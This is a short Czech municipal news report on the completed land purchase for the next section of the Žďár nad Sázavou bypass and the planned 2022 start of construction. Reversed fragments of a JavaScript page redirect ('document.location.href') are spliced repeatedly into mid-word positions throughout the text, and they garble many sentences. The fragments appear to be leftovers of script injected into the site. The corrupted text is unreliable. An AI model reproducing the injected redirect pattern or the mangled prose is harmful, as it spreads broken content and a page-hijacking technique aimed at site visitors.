Rainbow page separator

Pozemky jsou vykoupené, stavba obchvatu může začít napřesrok

Sobota, 5. června 2021

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Výkupu všech pozemků pro stavbu další části obchvatu města dosáhla žďárská radnice. Posledním krokem byl odkup budovy prodejny koberců u křižovatky ulic Jihlavská a Chelčického, přičemž měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ji následně prodalo Ředitelství silnic a dálnic ČR, v jehož kompetenci se výstavba obchvatu nachází. Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos má dojít k odstranění jak prodejny koberců, tak i dalších drobných staveb v trase obchvatu. Samotná silnice v délce bezmála osm set metrů, jež od okružní křižovatky v Brněnské ulici při vjezdu do města propojí Jihlavskou a Brněnskou ulici a odvede z průjezdu Žďárem další část tranzitní dopravy, by podle předběžného plánu mohla začít vznikat v roce 2022.
Au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobily se díky přeložce komunikace, jež vyústí na nové kruhové křižovatce v Jihlavské ulici, vyhnou frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovanému „kruháči“ u nákupního centra. Stávající okružní křižovatka v Brněnské ulici bude vypadat trochu jinak – stane se z ní elipsa, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jednak z kapacitního hlediska, ale také kvůli napojení účelových komunikací. Upravit bude třeba i „paprsky“ tvořené silnicemi I/37 a I/19.
Do nové okružní křižovatky v Jihlavské ulici se napojí i Chelčického ulice, která mimo jiné slouží k příjezdu na au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusové a vlakové nádraží a v dopravních špičkách se na výjezdu ucpává. Po dokončení nový úsek obchvatu naváže na propojku ulic Brněnská a Jamská a dál k mělkovické křižovatce ve směru na Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě.